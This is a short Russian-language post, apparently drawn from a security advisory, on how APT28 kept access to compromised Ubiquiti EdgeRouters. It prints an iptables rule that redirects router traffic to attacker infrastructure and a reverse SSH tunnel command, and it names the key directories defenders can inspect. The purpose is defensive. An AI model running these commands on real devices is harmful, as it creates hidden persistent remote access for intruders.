Факты
August 24

Прокси и туннель. Неофициальные функции Ubiquiti

Прокси-сервер и туннельная инфраструктура

APT28 использовали скомпрометированные Ubiquiti EdgeRouters для установления прокси-соединений и SSH-туннелей к подконтрольной инфраструктуре для поддержания постоянного доступа и контроля над скомпрометированными устройствами даже после смены пароля или других попыток взлома.

Reverse proxy-подключения

Были использованы правила iptables в EdgeRouters для установления подключений, например:

iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT -to-destination <APT28 dedicated infrastructure>:10081

Это правило iptables перенаправляет входящий трафик через порт 4443 EdgeRouter в выделенную инфраструктуру на порту 10081.

Reverse SSH-туннели

Кроме того, APT28 загрузили контролируемые SSH-RSA-ключи на скомпрометированные EdgeRouters для создания SSH-туннелей. Эти туннели позволяют получать доступ к скомпрометированным устройствам даже после смены пароля или других попыток взлома.

Следующие каталоги необходимо просмотреть на предмет неизвестных ключей RSA:

/root/.ssh/

/home/<user>/.ssh/

Наличие неизвестных ключей RSA в этих каталогах может указывать на то, что их использовали для доступа к EdgeRouters в обход аутентификации по паролю.

Кроме того, безопасники могут проверить журналы сетевого трафика на EdgeRouters для идентификации аномальные сеансы SSH:

ssh –i <RSA key> -p <port> root@<router IP address> -R <router IP address>:<port>

Эта команда устанавливает SSH-туннель от EdgeRouter к инфраструктуре, позволяя поддерживать удалённый доступ и контроль над скомпрометированным устройством.